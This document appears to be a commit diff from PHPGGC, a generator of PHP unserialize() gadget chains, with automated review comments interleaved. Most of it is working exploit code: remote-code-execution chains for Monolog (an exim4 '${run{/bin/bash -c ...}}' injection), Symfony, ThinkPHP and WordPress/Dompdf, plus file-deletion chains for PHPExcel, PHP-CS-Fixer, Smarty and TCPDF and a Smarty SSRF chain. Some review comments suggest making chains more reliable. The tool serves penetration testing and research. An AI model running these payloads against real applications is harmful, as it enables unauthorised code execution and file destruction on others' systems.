31 | ||
32 | function __construct($methods, $command) | |
33 | { | |
34 | $this->processors = null; | |
35 | $this->buffer = [$command]; | |
36 | $this->handler = new NativeMailerHandler($methods); | |
37 | } | |
38 | } | |
39 | } |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Monolog; | |
3 | ||
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE\Command | |
5 | { | |
6 | public static $version = '? <= 2.4.4+'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'whira'; | |
9 | public static $information = ' | |
10 | This chain will target debian based distribution (exim4 MTA) as it will perform a command injection on mail() | |
11 | and use exim4 extended strings, the payload is `/bin/bash -c "$command"`. | |
12 | As this GC requires a setup that is specific, you should have better results by running Monolog/RCE1 or | |
13 | Monolog/RCE2 instead. | |
14 | '; | |
15 | ||
16 | public function generate(array $parameters) | |
17 | { | |
18 | $command = $parameters['command']; | |
19 | ||
20 | return new \Monolog\Handler\RollbarHandler( | |
21 | new \Monolog\Handler\BufferHandler( | |
22 | new \Monolog\Handler\NativeMailerHandler($command) | |
23 | ) | |
24 | ); | |
25 | } | |
26 | } |
0 | <?php | |
1 | ||
2 | namespace Monolog\Handler | |
3 | { | |
4 | class RollbarHandler | |
5 | { | |
6 | private $hasRecords; | |
7 | protected $rollbarLogger; | |
8 | ||
9 | public function __construct($buffer) | |
10 | { | |
11 | $this->hasRecords = true; | |
12 | $this->rollbarLogger = $buffer; | |
13 | } | |
14 | } | |
15 | ||
16 | class BufferHandler | |
17 | { | |
18 | protected $bufferSize; | |
19 | protected $handler; | |
20 | protected $buffer; | |
21 | ||
22 | public function __construct($buffer) | |
23 | { | |
24 | $this->bufferSize = 2; | |
25 | $this->handler = $buffer; | |
26 | $this->buffer = [0 => array("level" => 100, | |
27 | "message" => 1, | |
28 | "context" => [], | |
29 | "extra" => [], | |
30 | "channel" => 1)]; | |
31 | } | |
32 | } | |
33 | ||
34 | class NativeMailerHandler | |
35 | { | |
36 | protected $level; | |
37 | protected $processors; | |
38 | protected $formatter; | |
39 | protected $maxColumnWidth; | |
40 | protected $parameters; | |
41 | protected $to; | |
42 | protected $headers; | |
43 | ||
44 | public function __construct($command) | |
45 | { | |
46 | $this->level = 1; | |
47 | $this->processors = ["array_reverse"]; | |
48 | // if $this->buffer[0] is carefully crafted | |
49 | // $this->format can be used to pass a payload through the 'body' parameter | |
50 | // via the LineFormatter | |
51 | // Here we used the headers param to pass the payload | |
52 | $this->formatter = new \Monolog\Formatter\LineFormatter(); | |
53 | $this->maxColumnWidth = 20; | |
54 | $this->parameters = ["-be"]; | |
55 | $this->headers = ['${run{/bin/bash -c "'.$command.'"}{yes}{no}}']; | |
56 | $this->to = ["init@localhost"]; | |
57 | } | |
58 | } | |
59 | } | |
60 | ||
61 | namespace Monolog\Formatter | |
62 | { | |
63 | class LineFormatter | |
64 | { | |
65 | protected $format; | |
66 | public function __construct() | |
67 | { | |
68 | $this->format = ""; | |
69 | } | |
70 | } | |
71 | } | |
72 |
0 | <?php | |
1 | namespace GadgetChain\PHPCSFixer; | |
2 | ||
3 | class FD1 extends \PHPGGC\GadgetChain\FileDelete | |
4 | { | |
5 | public static $version = '<= 2.17.3'; | |
6 | public static $vector = '__destruct'; | |
7 | public static $author = 'snoopysecurity'; | |
8 | ||
9 | public function generate(array $parameters) | |
10 | { | |
11 | $remote_file = $parameters["remote_file"]; | |
12 | ||
13 | return new \PhpCsFixer\FileRemoval($remote_file); | |
14 | } | |
15 | } | |
16 |
0 | <?php | |
1 | ||
2 | namespace PhpCsFixer | |
3 | { | |
4 | //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/FileRemoval.php | |
5 | class FileRemoval | |
6 | { | |
7 | ||
8 | function __construct($remote_file) | |
9 | { | |
10 | $this->files = [$remote_file => $remote_file]; | |
11 | ||
12 | } | |
13 | ||
14 | } | |
15 | } | |
16 | ||
17 | /* | |
18 | public function __destruct() | |
19 | { | |
20 | $this->clean(); | |
21 | } | |
22 | ||
23 | ||
24 | ||
25 | ||
26 | public function clean() | |
27 | { | |
28 | foreach ($this->files as $file => $value) { | |
29 | $this->unlink($file); | |
30 | } | |
31 | $this->files = []; | |
32 | } | |
33 | ||
34 | private function unlink($path) | |
35 | { | |
36 | @unlink($path); | |
37 | } | |
38 | } | |
39 | */ | |
40 | ||
41 | ||
42 | ?> |
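Review bot: Lines 17–39 paste the upstream `__destruct`/`clean`/`unlink` bodies as a comment block after the namespace has closed, while the comment on line 4 already links the exact upstream file at v2.17.3; commented-out code drifts from the referenced version and is noisy to maintain. A one-line pointer inside the class, such as `// upstream __destruct() calls clean(), which unlinks every key of $this->files — see the link above`, conveys the same context. The FD2 `chain.php` carries the same pasted blocks twice (inside `ProcessLinter` and after the `FileRemoval` namespace) and the PHPExcel `chain.php` has a similar block; the blank lines 40–41 before the closing tag are also surplus.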
0 | <?php | |
1 | ||
2 | namespace GadgetChain\PHPCSFixer; | |
3 | ||
4 | class FD2 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '<= 2.17.3'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'snoopysecurity'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $remote_file = $parameters["remote_file"]; | |
13 | ||
14 | return new \PhpCsFixer\Linter\ProcessLinter($remote_file); | |
15 | } | |
16 | }⏎ |
0 | <?php | |
1 | namespace PhpCsFixer\Linter | |
2 | { | |
3 | //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/Linter/ProcessLinter.php | |
4 | class ProcessLinter | |
5 | { | |
6 | ||
7 | function __construct($remote_file) | |
8 | { | |
9 | $this->temporaryFile = $remote_file; | |
10 | $this->fileRemoval = new \PhpCsFixer\FileRemoval(); | |
11 | ||
12 | } | |
13 | ||
14 | /* | |
15 | public function __destruct() | |
16 | { | |
17 | if (null !== $this->temporaryFile) { | |
18 | $this->fileRemoval->delete($this->temporaryFile); | |
19 | } | |
20 | } | |
21 | */ | |
22 | ||
23 | } | |
24 | } | |
25 | ||
26 | namespace PhpCsFixer | |
27 | { | |
28 | ||
29 | //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/FileRemoval.php | |
30 | class FileRemoval | |
31 | ||
32 | { | |
33 | ||
34 | public function delete($path) | |
35 | { | |
36 | if (isset($this->files[$path])) | |
37 | { | |
38 | unset($this->files[$path]); | |
39 | } | |
40 | $this->unlink($path); | |
41 | } | |
42 | private function unlink($path) | |
43 | { | |
44 | @unlink($path); | |
45 | } | |
46 | ||
47 | } | |
48 | } | |
49 | ||
50 | /* | |
51 | public function delete($path) | |
52 | { | |
53 | if (isset($this->files[$path])) { | |
54 | unset($this->files[$path]); | |
55 | } | |
56 | $this->unlink($path); | |
57 | } | |
58 | ||
59 | */ | |
60 | ||
61 | ?> |
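Review bot: `FileRemoval::delete()` and `unlink()` at lines 34-45 are live methods in the stub while the upstream `__destruct()` at lines 15-20 is commented out; the sibling stubs (PHPExcel DiscISAM, Dompdf CPDF) keep every behaviour method inside a comment so a gadget file loaded by the generator can never delete a file in its own process, and these two should move into a comment as well. The commented copy of `delete()` at lines 50-59 then becomes a duplicate and can go. `ProcessLinter` also writes `temporaryFile` and `fileRemoval` as undeclared dynamic properties; if upstream v2.17.3 declares them `private` (I believe it does — confirm against the linked file), the serialized names will lack the class mangling, so declaring `private $fileRemoval;` and `private $temporaryFile;` as the PHPExcel stubs do with `private $fileName` avoids relying on the target's unserialize() to map a public name onto a private slot. The trailing `?>` is dropped elsewhere in this commit (see the Phalcon gadgets) and could be dropped here too.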
0 | <?php | |
1 | ||
2 | namespace GadgetChain\PHPExcel; | |
3 | ||
4 | class FD1 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '1.8.2+'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | return new \PHPExcel_CachedObjectStorage_DiscISAM($parameters['remote_file']); | |
13 | } | |
14 | }⏎ |
0 | <?php | |
1 | ||
2 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php | |
3 | class PHPExcel_CachedObjectStorage_DiscISAM { | |
4 | private $fileName = null; | |
5 | private $fileHandle = 42; | |
6 | ||
7 | public function __construct($filePath) { | |
8 | $this->fileName = $filePath; | |
9 | } | |
10 | ||
11 | /* | |
12 | public function __destruct() { | |
13 | if (!is_null($this->fileHandle)) { | |
14 | fclose($this->fileHandle); // Will only produce a warning | |
15 | unlink($this->fileName); | |
16 | } | |
17 | $this->fileHandle = null; | |
18 | } | |
19 | */ | |
20 | }⏎ |
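Review bot: `private $fileHandle = 42;` exists so the commented-out `__destruct()`'s `!is_null()` check passes and `unlink()` is reached, and the upstream comment says `fclose()` on a non-resource only warns; that holds on PHP 7, but on PHP 8 passing an int to `fclose()` is, as far as I know, a `TypeError` thrown before `unlink()` runs, which would make this chain (and FD2, which uses the same trick) fail silently against PHP 8 targets. Worth a caveat in the chain's `$information`, e.g. `Relies on fclose() of a dummy int handle only warning; on PHP 8 targets this may throw a TypeError before unlink() — untested`, or a check against a PHP 8 target before the version string is left open-ended as '1.8.2+'.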
0 | <?php | |
1 | ||
2 | namespace GadgetChain\PHPExcel; | |
3 | ||
4 | class FD2 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '<= 1.8.1'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | return new \PHPExcel_CachedObjectStorage_DiscISAM($parameters['remote_file']); | |
13 | } | |
14 | }⏎ |
0 | <?php | |
1 | ||
2 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php | |
3 | class PHPExcel_CachedObjectStorage_DiscISAM { | |
4 | private $_fileName = null; | |
5 | private $_fileHandle = 42; | |
6 | ||
7 | public function __construct($filePath) { | |
8 | $this->_fileName = $filePath; | |
9 | } | |
10 | ||
11 | /* | |
12 | public function __destruct() { | |
13 | if (!is_null($this->_fileHandle)) { | |
14 | fclose($this->_fileHandle); // Will only produce a warning | |
15 | unlink($this->_fileName); | |
16 | } | |
17 | $this->_fileHandle = null; | |
18 | } // function __destruct() | |
19 | */ | |
20 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\PHPExcel; | |
3 | ||
4 | class FD3 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '1.8.2+'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | return new \PHPExcel_Shared_XMLWriter($parameters['remote_file']); | |
13 | } | |
14 | }⏎ |
0 | <?php | |
1 | ||
2 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/Shared/XMLWriter.php | |
3 | class PHPExcel_Shared_XMLWriter { | |
4 | private $tempFileName = ''; | |
5 | ||
6 | public function __construct($filePath) { | |
7 | $this->tempFileName = $filePath; | |
8 | } | |
9 | ||
10 | /* | |
11 | public function __destruct() | |
12 | { | |
13 | // Unlink temporary files | |
14 | if ($this->tempFileName != '') { | |
15 | @unlink($this->tempFileName); | |
16 | } | |
17 | } | |
18 | */ | |
19 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\PHPExcel; | |
3 | ||
4 | class FD4 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '<= 1.8.1'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | return new \PHPExcel_Shared_XMLWriter($parameters['remote_file']); | |
13 | } | |
14 | }⏎ |
0 | <?php | |
1 | ||
2 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/Shared/XMLWriter.php | |
3 | class PHPExcel_Shared_XMLWriter { | |
4 | private $_tempFileName = ''; | |
5 | ||
6 | public function __construct($filePath) { | |
7 | $this->_tempFileName = $filePath; | |
8 | } | |
9 | ||
10 | /* | |
11 | public function __destruct() | |
12 | { | |
13 | // Unlink temporary files | |
14 | if ($this->_tempFileName != '') { | |
15 | @unlink($this->_tempFileName); | |
16 | } | |
17 | } | |
18 | */ | |
19 | }⏎ |
6 | 6 | public static $version = '<= 1.2.2'; |
7 | 7 | public static $vector = '__wakeup'; |
8 | 8 | public static $author = 'Raz0r'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | This chain does not expect parameters, will eval() any code supplied in |
11 | 11 | php://input (i.e. POST data). Requires allow_url_include = true. |
12 | 12 | '; |
0 | 0 | <?php |
1 | 1 | |
2 | namespace Phalcon\Di{ | |
2 | namespace Phalcon\Di { | |
3 | 3 | class Service { |
4 | 4 | protected $_shared; |
5 | 5 | protected $_definition; |
69 | 69 | } |
70 | 70 | } |
71 | 71 | |
72 | ?> |
1 | 1 | |
2 | 2 | namespace GadgetChain\Pydio\Guzzle; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '< 8.2.2'; |
7 | 7 | public static $vector = '__toString'; |
1 | 1 | |
2 | 2 | namespace GadgetChain\Slim; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '3.8.1'; |
7 | 7 | public static $vector = '__toString'; |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Smarty; | |
3 | ||
4 | class FD1 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '?'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'd3adc0de'; | |
9 | public static $parameters = [ | |
10 | 'remote_file' | |
11 | ]; | |
12 | ||
13 | public function generate(array $parameters) | |
14 | { | |
15 | return new \Smarty_Internal_Template($parameters['remote_file']); | |
16 | } | |
17 | }⏎ |
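Review bot: `public static $parameters = ['remote_file'];` at lines 9-11 is redeclared here although the other `FileDelete` chains in this commit (PHPExcel FD1-FD4, TCPDF FD1, PHPCSFixer FD2) read `$parameters['remote_file']` without declaring it, which suggests the base class already provides it; if so, the redeclaration is redundant and should go for consistency, and if not, the others are the ones missing it. `$version = '?'` and the absent `$information` also leave a user with nothing to go on; even `Tested against Smarty <version>; lock_id is handed to unlink() by the file cache resource's releaseLock()` (with the version actually tested) would help.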
0 | <?php | |
1 | ||
2 | abstract class Smarty_CacheResource | |
3 | { | |
4 | } | |
5 | ||
6 | class Smarty_Internal_CacheResource_File extends Smarty_CacheResource | |
7 | { | |
8 | public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) | |
9 | { | |
10 | $cached->is_locked = false; | |
11 | unlink($cached->lock_id); | |
12 | } | |
13 | } | |
14 | ||
15 | class Smarty_Template_Cached | |
16 | { | |
17 | public $lock_id = null; | |
18 | public $is_locked = true; | |
19 | ||
20 | public function __construct() | |
21 | { | |
22 | $this->handler = new Smarty_Internal_CacheResource_File(); | |
23 | $this->lock_id = ''; | |
24 | } | |
25 | ||
26 | public function setlock($lock_id){ | |
27 | if($lock_id){ | |
28 | $this->lock_id = $lock_id; | |
29 | } | |
30 | } | |
31 | } | |
32 | ||
33 | class Smarty_Internal_TemplateBase | |
34 | { | |
35 | } | |
36 | ||
37 | class Smarty extends Smarty_Internal_TemplateBase | |
38 | { | |
39 | public $cache_locking = true; | |
40 | public $cache_dir; | |
41 | public $use_sub_dirs; | |
42 | public function __construct(){ | |
43 | $this->cache_locking = 1; | |
44 | $this->cache_dir = "/"; | |
45 | $this->use_sub_dirs = true; | |
46 | $this->cache = true; | |
47 | } | |
48 | } | |
49 | ||
50 | class Smarty_Internal_Template extends Smarty_Internal_TemplateBase | |
51 | { | |
52 | ||
53 | public $cached; | |
54 | public $smarty; | |
55 | ||
56 | public function __construct($lock_id){ | |
57 | $this->smarty = new Smarty(); | |
58 | $this->cached = new Smarty_Template_Cached(); | |
59 | $this->setlock($lock_id); | |
60 | } | |
61 | ||
62 | public function setlock($lock_id){ | |
63 | $this->cached->setlock($lock_id); | |
64 | } | |
65 | ||
66 | } | |
67 | ||
68 | ?> |
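Review bot: `Smarty_Template_Cached::setlock()` at lines 26-30 guards with `if($lock_id)`, so a `remote_file` of `'0'` (or any falsy string) is silently dropped and `lock_id` stays `''`; `if ($lock_id !== '')`, or assigning unconditionally, is what the FD chain needs. `Smarty_Internal_CacheResource_File::releaseLock()` is also left live (it `unlink()`s `$cached->lock_id`) whereas the other stubs in this commit comment out behaviour methods; moving it into a comment keeps the generator process from ever being able to execute it. Both `Smarty` and `Smarty_Template_Cached` assign undeclared properties (`$this->cache`, `$this->handler`); if upstream declares those non-public, the serialized names will be unmangled, so declaring them with the upstream visibility is safer. The closing `?>` at line 68 is removed elsewhere in this commit and can go here too.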
0 | <?php | |
1 | namespace GadgetChain\Smarty; | |
2 | ||
3 | class SSRF1 extends \PHPGGC\GadgetChain\SSRF | |
4 | { | |
5 | public static $version = '?'; | |
6 | public static $vector = '__destruct'; | |
7 | public static $foundby = 'unknown'; | |
8 | public static $author = 'mr_me'; | |
9 | public static $information = ' | |
10 | Reference: https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Positive-Research-2014-eng.pdf (2014). | |
11 | This was originally an XXE gadget chain, but it does not work on recent PHP versions. | |
12 | Therefore, the gadget chain is now just an SSRF. | |
13 | According to raz0r, it "works only in PHP <5.4.12/5.3.22". | |
14 | '; | |
15 | ||
16 | public function generate(array $parameters) | |
17 | { | |
18 | return new \Smarty_Internal_Template($parameters['uri']); | |
19 | } | |
20 | } | |
21 | ?> |
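Review bot: `public static $foundby = 'unknown';` at line 7 is a property no other chain in this commit uses (they carry `$author`), and since its value is 'unknown' it adds nothing; dropping it avoids an ad-hoc field. The `$information` text is ambiguous about what `works only in PHP <5.4.12/5.3.22` applies to: read literally it restricts the SSRF, while the preceding sentences suggest only the original XXE is version-bound; rewording to `The original XXE variant only works on PHP < 5.4.12 / 5.3.22 (raz0r); the SSRF is what remains on newer versions` (if that is what was meant) removes the doubt. `$version = '?'` and the trailing `?>` follow the same pattern as the Smarty FD1 chain.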
0 | <?php | |
1 | class Smarty_Template_Cached | |
2 | { | |
3 | public $is_locked = true; | |
4 | public function __construct($url) | |
5 | { | |
6 | $res = parse_url($url); | |
7 | $this->handler = new SoapClient(null, [ | |
8 | 'uri' => $res['scheme'] . '://' . $res['host'] . '/', | |
9 | 'location' => $url | |
10 | ]); | |
11 | } | |
12 | } | |
13 | ||
14 | class Smarty | |
15 | { | |
16 | public $cache_locking = true; | |
17 | } | |
18 | ||
19 | class Smarty_Internal_Template | |
20 | { | |
21 | public $cached; | |
22 | public $smarty; | |
23 | ||
24 | public function __construct($url) | |
25 | { | |
26 | $this->smarty = new Smarty(); | |
27 | $this->cached = new Smarty_Template_Cached($url); | |
28 | } | |
29 | } | |
30 | ?> |
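Review bot: `Smarty_Template_Cached::__construct()` at lines 4-11 indexes `parse_url($url)` for `scheme` and `host` without checking them, so a `uri` such as `localhost:8080/` or a bare path yields undefined-index notices and a SoapClient `uri` of `://` + `/`; a guard `if ($res === false || !isset($res['scheme'], $res['host'])) { throw new \InvalidArgumentException('uri must include scheme and host'); }` fails fast with a clear message at generation time. The `SoapClient` is built in non-WSDL mode (first argument `null`), where both `uri` and `location` are required, so the check also documents that contract. The trailing `?>` can be dropped as in the Phalcon gadgets change.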
6 | 6 | public static $version = '2.5.2'; |
7 | 7 | public static $vector = 'DebugImport'; |
8 | 8 | public static $author = 'cf'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | This chain is supposed to be uploaded through the /_profiler/import |
11 | 11 | page. It will produce an error but the file will be created in the |
12 | 12 | webroot. |
1 | 1 | |
2 | 2 | namespace GadgetChain\Symfony; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\Command | |
5 | 5 | { |
6 | 6 | public static $version = '3.3'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'cf'; |
9 | public static $informations = 'Executes given command through proc_open()'; | |
10 | public static $parameters = [ | |
11 | 'command' | |
12 | ]; | |
9 | public static $information = 'Executes given command through proc_open()'; | |
13 | 10 | |
14 | 11 | public function generate(array $parameters) |
15 | 12 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\Symfony; |
3 | 3 | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
5 | 5 | { |
6 | 6 | public static $version = '2.3.42 < 2.6'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'crlf'; |
9 | public static $informations = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )'; | |
10 | public static $parameters = [ | |
11 | 'code' | |
12 | ]; | |
9 | public static $information = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )'; | |
13 | 10 | |
14 | 11 | public function generate(array $parameters) |
15 | 12 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\Symfony; |
3 | 3 | |
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
5 | 5 | { |
6 | 6 | public static $version = '2.6 <= 2.8.32'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'crlf'; |
9 | public static $informations = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )'; | |
10 | public static $parameters = [ | |
11 | 'code' | |
12 | ]; | |
9 | public static $information = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )'; | |
13 | 10 | |
14 | 11 | public function generate(array $parameters) |
15 | 12 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\Symfony; |
3 | 3 | |
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '3.4.0-34, 4.2.0-11, 4.3.0-7'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'wisdomtree'; |
9 | public static $informations = 'Execute $function with $parameter (CVE-2019-18889)'; | |
9 | public static $information = 'Execute $function with $parameter (CVE-2019-18889)'; | |
10 | 10 | public static $parameters = [ |
11 | 11 | 'function', |
12 | 12 | 'parameter' |
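Review bot: `RCE4` keeps its explicit `public static $parameters = ['function', 'parameter']` (lines 10-12; the array closes past the hunk) while this same commit removes the `$parameters` declaration from Symfony RCE1-RCE3 when switching them to the `RCE\Command`/`RCE\PHPCode` bases, and the WordPress chains that extend `RCE\FunctionCall` read `$parameters['function']`/`['parameter']` with no declaration at all. If `FunctionCall` already declares these two, the lines here are redundant and should be removed for consistency.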
0 | <?php | |
1 | ||
2 | namespace GadgetChain\TCPDF; | |
3 | ||
4 | class FD1 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '<= 6.3.5'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'timoles'; | |
9 | public static $information = ' | |
10 | TCPDF contains the variable "imagekeys" which expects an array of strings. Upon __destruct an "unlink()" is | |
11 | called on all filepaths within the imagekeys array. | |
12 | '; | |
13 | ||
14 | public function generate(array $parameters) | |
15 | { | |
16 | $file = $parameters['remote_file']; | |
17 | ||
18 | return new \TCPDF( | |
19 | $file | |
20 | ); | |
21 | } | |
22 | } |
0 | <?php | |
1 | ||
2 | class TCPDF { | |
3 | protected $imagekeys; | |
4 | ||
5 | function __construct($remote_file) { | |
6 | $this->imagekeys = [ | |
7 | $remote_file | |
8 | ]; | |
9 | } | |
10 | } |
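Review bot: This stub carries neither a source reference nor the commented-out upstream `__destruct()` that the other gadget files in this commit include (Dompdf CPDF, EmailSubscribers, PHPExcel), so the chain's claim that `unlink()` is called on every `imagekeys` entry cannot be checked from here; add a link to the `tcpdf.php` file at the tag it was verified against and paste the destructor in a comment. `protected $imagekeys` must also match the upstream visibility exactly for the serialized property name to be found on the target; a short comment saying it was checked against 6.3.5 would record that.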
1 | 1 | |
2 | 2 | namespace GadgetChain\ThinkPHP; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '5.1.x-5.2.x'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'Smi1e'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | This chain can only execute system(). |
11 | 11 | Because the second parameter is uncontrollable |
12 | 12 | '; |
13 | ||
13 | 14 | public function generate(array $parameters) |
14 | 15 | { |
15 | 16 | $function = $parameters['function']; |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\Dompdf; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '0.8.5+ & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = ' | |
10 | Tested up to WP 5.4.1 and Dompdf 0.8.5. Newest versions might also work. | |
11 | Example of plugins using this library: | |
12 | woocommerce-pdf-invoices-packing-slips (lib only included when a PDF is output) | |
13 | advanced-cf7-db (lib only included when PDF generated) | |
14 | '; | |
15 | ||
16 | public function generate(array $parameters) | |
17 | { | |
18 | $function = $parameters['function']; | |
19 | $parameter = $parameters['parameter']; | |
20 | ||
21 | return new \Dompdf\Adapter\CPDF( | |
22 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
23 | ); | |
24 | } | |
25 | }⏎ |
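Review bot: `$version = '0.8.5+ & WP < 5.5.2'` at line 6 carries two constraints that `$information` never explains: the 0.8.5 split from RCE2 follows from the stub's comment that `_image_cache` became `protected` there (which changes the serialized property name), and the WordPress bound presumably reflects WordPress 5.5.2 hardening `Requests_Utility_FilteredIterator` against unserialize() — confirm the latter. Adding a line such as `Dompdf >= 0.8.5 changed _image_cache from private to protected (see RCE2 for older versions); WP >= 5.5.2 blocks the Requests_Utility_FilteredIterator gadget` to `$information` saves the next reader from re-deriving both.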
0 | <?php | |
1 | ||
2 | namespace | |
3 | { | |
4 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
5 | } | |
6 | ||
7 | namespace Dompdf\Adapter | |
8 | { | |
9 | // https://github.com/dompdf/dompdf/blob/master/src/Adapter/CPDF.php | |
10 | class CPDF | |
11 | { | |
12 | // Since 0.8.5, this attribute is protected (was private before) | |
13 | protected $_image_cache; | |
14 | ||
15 | // Custom contrustor to set the payload | |
16 | public function __construct($image_cache) | |
17 | { | |
18 | $this->_image_cache = $image_cache; | |
19 | } | |
20 | ||
21 | /* | |
22 | public function __destruct() | |
23 | { | |
24 | foreach ($this->_image_cache as $img) { | |
25 | // The file might be already deleted by 3rd party tmp cleaner, | |
26 | // the file might not have been created at all | |
27 | // (if image outputting commands failed) | |
28 | // or because the destructor was called twice accidentally. | |
29 | if (!file_exists($img)) { | |
30 | continue; | |
31 | } | |
32 | ||
33 | if ($this->_dompdf->getOptions()->getDebugPng()) { | |
34 | print '[__destruct unlink ' . $img . ']'; | |
35 | } | |
36 | if (!$this->_dompdf->getOptions()->getDebugKeepTemp()) { | |
37 | unlink($img); | |
38 | } | |
39 | } | |
40 | } | |
41 | */ | |
42 | } | |
43 | }⏎ |
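Review bot: The source reference at line 9 points at `blob/master/src/Adapter/CPDF.php`, so the commented-out `__destruct()` below it can drift from what the link shows; the RCE2 stub pins `v0.8.4`, and this one should pin whichever tag was actually compared against in the same way. The typo `contrustor` at line 15 should read `constructor` (the RCE2 stub has the same one).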
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\Dompdf; | |
3 | ||
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '0.7.0 <= 0.8.4 & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = ' | |
10 | Tested up to WP 5.4.1 and Dompdf 0.8.4. | |
11 | Example of plugins using this library: | |
12 | woocommerce-pdf-invoices-packing-slips (lib only included when a PDF is output) | |
13 | advanced-cf7-db (lib only included when PDF generated) | |
14 | '; | |
15 | ||
16 | public function generate(array $parameters) | |
17 | { | |
18 | $function = $parameters['function']; | |
19 | $parameter = $parameters['parameter']; | |
20 | ||
21 | return new \Dompdf\Adapter\CPDF( | |
22 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
23 | ); | |
24 | } | |
25 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace | |
3 | { | |
4 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
5 | } | |
6 | ||
7 | namespace Dompdf\Adapter | |
8 | { | |
9 | // https://github.com/dompdf/dompdf/blob/v0.8.4/src/Adapter/CPDF.php | |
10 | class CPDF | |
11 | { | |
12 | private $_image_cache; | |
13 | ||
14 | // Custom contrustor to set the payload | |
15 | public function __construct($image_cache) | |
16 | { | |
17 | $this->_image_cache = $image_cache; | |
18 | } | |
19 | ||
20 | /* | |
21 | public function __destruct() | |
22 | { | |
23 | foreach ($this->_image_cache as $img) { | |
24 | // The file might be already deleted by 3rd party tmp cleaner, | |
25 | // the file might not have been created at all | |
